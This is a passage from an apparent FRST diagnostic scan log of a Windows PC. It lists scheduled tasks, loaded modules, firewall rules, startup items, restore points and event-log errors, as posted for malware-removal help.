Task: {F48C3389-DD00-468F-A973-CFDC7DBC1811} - System32\Tasks\HP AR Program Upload - 0d60bc3f0082496cb0a78fb164966ae5a438eec360ce49da826ce93d3fddc137 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {F527B042-0A90-41E1-BB74-CB6A04386782} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation)
Task: {F7839AA3-029F-4006-8CAA-6F10A08907C6} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-03-26] (Microsoft Corporation)
Task: {FB4AE634-F4B6-4C0A-8A6A-A65CD4BDFB0A} - System32\Tasks\DRScanner Startup => C:\Program Files (x86)\Trend Micro\DRScanner\DRScanner.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\EPSON WF-3620 Series Invitation {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE
Task: C:\Windows\Tasks\EPSON WF-3620 Series Update {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE :/EXE:{3B76C7EA-C0FF-4F54-B66C-1997DF8C469D} /F:Update  SYSTEM ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\Windows\Tasks\HPCeeScheduleForKEKLR.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2010-05-18 14:12 - 2009-11-05 08:40 - 00085504 _____ () C:\Windows\System32\cpwmon64.dll
2016-08-23 19:23 - 2017-02-26 15:32 - 08930496 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2009-07-21 13:34 - 2009-07-21 13:34 - 00610872 _____ () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
2009-08-09 04:42 - 2009-01-21 14:47 - 00247152 ____N () C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
2009-07-01 18:44 - 2009-07-01 18:44 - 00632888 _____ () C:\Program Files (x86)\Hewlett-Packard\Shared\hpqToaster.exe
2015-06-03 13:44 - 2015-06-03 13:44 - 00315648 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\dblite.dll
2009-07-23 14:37 - 2009-07-23 14:37 - 00931112 ____N () c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMediaLibrary.dll
2009-07-24 21:24 - 2009-07-24 21:24 - 00124288 ____N () c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CLSchMgr.dll
2009-07-24 21:24 - 2009-07-24 21:24 - 00275848 ____N () c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CLCapEngine.dll
2009-07-24 21:24 - 2009-07-24 21:24 - 00349480 ____N () c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CLTinyDB.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00061440 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\PCAlerts\PCAlertsPillar.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00131072 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\ECenter\ECLibrary.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00040960 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingServer.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00005632 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingInterface.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00018944 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingMessages.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00036864 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingClients.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00007680 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\RemotingClient.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00028672 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Microsoft.Practices.EnterpriseLibrary.ExceptionHandling.Logging.dll
2009-11-19 10:20 - 2009-11-19 10:20 - 02121728 _____ () C:\Program Files (x86)\Common Files\LightScribe\QtCore4.dll
2009-11-19 10:20 - 2009-11-19 10:20 - 07745536 _____ () C:\Program Files (x86)\Common Files\LightScribe\QtGui4.dll
2009-11-19 10:20 - 2009-11-19 10:20 - 00135168 _____ () C:\Program Files (x86)\Common Files\LightScribe\plugins\imageformats\qjpeg4.dll
2015-06-16 16:47 - 2015-06-16 16:47 - 00100688 _____ () C:\Program Files (x86)\Citrix\AuthManager\AppReceiverSDKWrapper.dll
2016-08-23 19:23 - 2017-02-26 13:58 - 08929984 _____ () C:\Program Files (x86)\Microsoft Office\Root\Office16\1033\GrooveIntlResource.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2016-08-23 19:17 - 2017-03-05 19:51 - 00252608 _____ () C:\Program Files (x86)\Microsoft Office\root\Office16\IEAWSDC.DLL

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\sharepoint.com -> hxxps://geisinger-files.sharepoint.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2012-08-15 20:16 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 204.186.80.229 - 204.186.110.114
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^KEKLR^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: msnmsgr => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
MSCONFIG\startupreg: NortonOnlineBackupReminder => "C:\Program Files (x86)\Symantec\Norton Online Backup\Activation\NobuActivation.exe" UNATTENDED
MSCONFIG\startupreg: ooVoo.exe => C:\Program Files (x86)\ooVoo\oovoo.exe /minimized
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{E1D7F83E-8125-4845-90A7-673ADEF33553}] => (Allow) svchost.exe
FirewallRules: [{B3229E98-0217-4660-8DE6-F3FAB7DC660B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector\PDR.EXE
FirewallRules: [{25561CBD-ECD5-4B2A-A6B7-AAC23815F36E}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartMusic.exe
FirewallRules: [{DFFCBF30-C5DF-4898-8A74-672CBD634E93}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartPhoto.exe
FirewallRules: [{1A8F384C-D5FB-424C-864F-DFBDD7097751}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartVideo.exe
FirewallRules: [{25AD11FD-9A9F-4400-AD7E-D1702D6879EC}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\TSMAgent.exe
FirewallRules: [{88F56785-A335-4A9E-A307-233FED433B1E}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\Kernel\CLML\CLMLSvc.exe
FirewallRules: [{0FA28E00-84B9-499D-BABD-0FF0CB52E7DA}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPDVDSmart.exe
FirewallRules: [{EA67C5FD-9887-4967-B124-B80BDD1D9572}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\HPTouchSmartMusic.exe
FirewallRules: [{C32D536B-BDF8-48A2-B50E-15F07DFB9F1A}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\HPTouchSmartPhoto.exe
FirewallRules: [{5AAFCC03-01D9-4D96-9427-3F2C6DE5154E}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\HPTouchSmartVideo.exe
FirewallRules: [{EA1F0951-8BA5-41CB-A72A-34307C6E1966}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\TSMAgent.exe
FirewallRules: [{98616B3D-0AAC-4C16-8ECE-981D41D17865}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
FirewallRules: [{D639F928-A1C7-4D0F-9135-C8527DF99989}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\QP.exe
FirewallRules: [{CD01A839-E293-40DF-A297-6D1E71CBF919}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\QPService.exe
FirewallRules: [{1159FAE0-AD6A-402E-BF7C-378981DE37CE}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{4216947E-E48E-4D68-832C-B84405FCA4FD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{B1B24A7E-5C03-4B2E-BC74-F446D90241B1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{71E5C151-FC96-44B3-A2CA-A748564E2318}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{AE1DD8AE-DAA6-4E3A-A82E-0B84DD062818}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{2E3483C0-9134-4DEC-A8D6-FE74ABD65F6D}] => (Allow) C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [TCP Query User{9F515C7B-8CC7-4B76-8DF6-F904758E6FF6}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Allow) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [UDP Query User{8D839777-A6FB-47E8-B380-7AD82C5F564F}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Allow) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [TCP Query User{5A0D406D-2C29-4D0B-83D7-D26AF7FFE562}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Block) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [UDP Query User{A60AD26E-BC55-4B0C-BB47-6E4EF5036555}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Block) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [{93464EED-A641-4CB5-8DC6-92BFDF7A1E14}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
FirewallRules: [{DC01FAA2-E761-4009-AD0C-43E643AD9B75}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
FirewallRules: [TCP Query User{303F326C-E8E1-4E8E-B813-F47FFD9F0723}C:\windows\system32\wfs.exe] => (Allow) C:\windows\system32\wfs.exe
FirewallRules: [UDP Query User{DCA3884F-EB76-4A60-A6B9-1DFF3FE0BBD0}C:\windows\system32\wfs.exe] => (Allow) C:\windows\system32\wfs.exe
FirewallRules: [{807B38CE-D94F-4932-B5B4-76AFD4EACD49}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{286E2E43-1C9B-4F06-B81D-1AC670CE9FB6}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [{60FE7295-6201-4657-999B-4EF247CE7B99}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [TCP Query User{1DE570DA-78EC-4184-A009-98FB9B493B34}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [UDP Query User{D887F8EE-A443-40B6-B7B5-600540129350}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [{5AB7D43E-8475-4578-A94A-1F2F90B7D6C0}] => (Allow) LPort=443
FirewallRules: [{B64ACE0E-B87F-4398-B1F3-852D19BE57F9}] => (Allow) LPort=443
FirewallRules: [{F6B20571-EB14-49D0-94C9-80FCB65ADCFF}] => (Allow) LPort=37674
FirewallRules: [{62D436F2-ADC2-4C86-96A8-B1F8CB9AC10F}] => (Allow) LPort=37674
FirewallRules: [{C3651C1F-C25C-4E6F-B502-3D5354C27B43}] => (Allow) LPort=37675
FirewallRules: [{0544294C-EA9B-402F-8605-23FF31F7AD74}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{9CED51D6-960B-413C-A290-F9C46BAA9D15}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{65EADB25-C00A-4DDC-A22F-5E81ACCB0EA9}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{A094DAF1-5D2E-4D12-8F1E-8FADDCD6C8FF}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{DCE8C09D-7BD0-4FFC-B0DE-1BAAA0BF727B}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [{F2411DBE-A931-4B28-BDBC-0F63AE569E04}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [TCP Query User{A4BC3617-A8AF-41F7-AEE3-B1AE7B986930}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [UDP Query User{6536AA84-BEB9-43E7-BD20-81F36A8A183E}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [TCP Query User{77151B81-74DA-46B2-B739-F1A0BFDE09EF}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Allow) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [UDP Query User{41503EB1-8543-4238-BC72-9C7F53E08CFC}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Allow) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [{572FCD51-C732-4315-89C8-E6BADF60CB1F}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{099E1608-3E83-453C-A568-BB3965D87EA4}] => (Allow) LPort=2869
FirewallRules: [{54E040B6-7378-4097-BFDA-57CEB23FB0C2}] => (Allow) LPort=1900
FirewallRules: [{31C42B69-8BB5-4738-AE2A-5F21F0EAC60E}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [TCP Query User{D7ECE11A-14F4-47CD-8B60-C5D3AD970D7D}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [UDP Query User{B68C8F2B-1ACD-468A-A168-2FEADD06031B}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [{7025A58C-00CD-4143-96DB-FA06A2ED5CC4}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1A452F1C-3A13-47C6-9924-6B9FE2FA2EE0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{ADE58B14-70C6-4153-91AC-3B0E36524493}] => (Allow) C:\Windows\SysWOW64\dlcccoms.exe
FirewallRules: [{7301EA4A-8CC4-4DE8-AECF-6DAECD8DF3A8}] => (Allow) C:\Windows\SysWOW64\dlcccoms.exe
FirewallRules: [{9FCC936F-1ECC-4FF9-831B-D494B20D60CB}] => (Allow) C:\Windows\System32\dlcccoms.exe
FirewallRules: [{EE85E7CE-EDE5-48AC-95A9-56633C10661C}] => (Allow) C:\Windows\System32\dlcccoms.exe
FirewallRules: [{50F741E4-BECA-4A15-9FB8-0C32E919209B}] => (Allow) C:\Windows\System32\spool\drivers\x64\3\dlccpswx.exe
FirewallRules: [{F8DB05C7-6658-4DBF-8235-A5838701AA01}] => (Allow) C:\Windows\System32\spool\drivers\x64\3\dlccpswx.exe
FirewallRules: [{FBBE89C6-499F-4202-99AB-543184772EBF}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccmon.exe
FirewallRules: [{FCDFFDF1-B40D-44DE-8327-3E803EEC7AA7}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccmon.exe
FirewallRules: [{ADB57472-D531-4A14-B8EC-5CF09B84E0D7}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccaiox.exe
FirewallRules: [{29BA85FB-5A48-4FAC-A9E5-EF97C797EBE1}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccaiox.exe
FirewallRules: [{69C5F1E2-2BBF-4AC5-99AE-6EE52620C3BF}] => (Allow) C:\Users\KEKLR\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [{4F8121D3-305E-4B52-A980-511CF6637DA6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0969CE3F-AB75-4EDF-91BF-B24144E5BA03}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{64FD7F62-CA4F-4BC4-96FF-78AF71530077}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [TCP Query User{70E1C592-B5C7-4724-8604-76CC8BAD46A9}C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe] => (Allow) C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe
FirewallRules: [UDP Query User{CB9AB233-D91A-411D-BF56-A1B265C80959}C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe] => (Allow) C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe
FirewallRules: [{167D5738-02EB-40A8-B8C3-0E4C0E60F425}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{6C278C1F-E02F-4F95-B22A-12C9D9CAFBE2}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{E4E886C7-1D80-42F9-B576-B3BC4F70B32E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{C30BB94F-9D99-4F73-A420-F14961B522E1}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{9E3958BA-AD48-45B7-B7F9-9CEFF14FE771}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{B81E0F49-BA90-4FF1-9A42-A74A41023898}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS1ADC\HPDiagnosticCoreUI.exe
FirewallRules: [{0647A174-0085-4BC0-9CA8-41C072C6371D}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS1ADC\HPDiagnosticCoreUI.exe
FirewallRules: [{D8133625-8DFD-427B-9111-3D14776DFE7A}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS744B\HPDiagnosticCoreUI.exe
FirewallRules: [{8E3EA3F7-663E-4722-852F-74C24267D0B0}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS744B\HPDiagnosticCoreUI.exe
FirewallRules: [{84AECAC3-5692-4F37-B037-77FBE65C0467}] => (Allow) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
FirewallRules: [{3F971EA5-E550-44CC-BBD1-93F058891F2C}] => (Allow) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
FirewallRules: [TCP Query User{362CB37B-AAA1-45EF-A332-40E197A57F28}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Allow) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [UDP Query User{717A6F34-710F-48AF-996D-EE1FFC536B8B}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Allow) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [{62A8F062-EB0C-4869-8EC9-5517C0C12356}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{9258237D-3CBE-457D-8BC3-B2B68083BB2D}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{54F78F36-2594-42A1-B051-D6E5ADE67F9C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{2F9785B8-F539-48A6-BA58-64C1FBF652D3}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{13573266-BCD3-483A-A735-153867261B87}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{C6B475F1-8916-4E39-9711-A5D018D1F5F7}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{FDED0C5D-B2C0-41D1-A5B1-410036D5E616}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{37C5CB39-992C-4F99-90F0-F2718E8518BA}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{D0DC0116-BF41-4FA5-98EE-EF32ECA5DF10}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [TCP Query User{F1F23913-8C7D-4B13-8D5A-52CC3B81421D}C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe] => (Allow) C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe
FirewallRules: [UDP Query User{7297ADDE-FFEE-4429-8DAD-7A733755025B}C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe] => (Allow) C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe
FirewallRules: [{9D2427F4-C33D-4E14-9231-9FFB1BBC1103}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{B9D14B95-5465-4B94-9856-C19342AF6B05}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{2E258567-5593-43F5-A73C-78A7678C2B39}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{E0DF924F-D6D4-4654-A974-39E33E8AD879}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{35A11117-24D7-4D6D-B9E2-0B15FB659EE3}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{D752A735-DAF5-4D93-B15B-27B28773A8AD}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{32A83C1F-89D4-4CBE-86D7-E8951ACF4700}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{8045D3CF-65FE-46B4-B636-F5BF369728D9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{F283683E-A7E1-4A6D-8520-E295EFEF38C2}C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe] => (Allow) C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe
FirewallRules: [UDP Query User{607FE590-DF2E-479C-9421-F45292DFA0A9}C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe] => (Allow) C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe
FirewallRules: [{2AB6E6B9-4C5B-49D9-864E-2BA0C900C86E}] => (Allow) C:\Windows\Temp\DRSUnzipTemp\sdk\TmDrMon.exe
FirewallRules: [{E1E69D41-EA01-49BA-9769-D2C8FA30C630}] => (Allow) C:\Windows\Temp\DRSUnzipTemp\sdk\TmDrMon.exe
FirewallRules: [{2239062F-51E6-476E-B7F6-F5A9FE1F0608}] => (Allow) C:\Windows\Temp\DRSUnzipTemp\sdk\TmDrMon.exe

==================== Restore Points =========================

23-03-2017 17:47:02 Windows Update
30-03-2017 19:34:54 Windows Update
01-04-2017 07:21:37 Windows Update
05-04-2017 04:42:14 Windows Update
08-04-2017 08:47:30 Windows Update
09-04-2017 17:48:24 Restore Point Created by FRST
09-04-2017 18:43:29 Malwarebytes Anti-Rootkit Restore Point
09-04-2017 19:19:21 Microsoft Antimalware Checkpoint
10-04-2017 19:53:40 Microsoft Antimalware Checkpoint

==================== Faulty Device Manager Devices =============

Name: HP Integrated Module with Bluetooth 2.0 Wireless Technology
Description: HP Integrated Module with Bluetooth 2.0 Wireless Technology
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Broadcom
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:
==================
Error: (04/11/2017 05:34:59 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/11/2017 05:34:59 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/11/2017 05:31:24 PM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (04/11/2017 07:27:06 AM) (Source: SideBySide) (EventID: 63) (User: )
Description: Activation context generation failed for "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll".Error in manifest or policy file "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll" on line 3.
The value "MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR" of attribute "version" in element "assemblyIdentity" is invalid.

Error: (04/11/2017 07:13:39 AM) (Source: SideBySide) (EventID: 80) (User: )
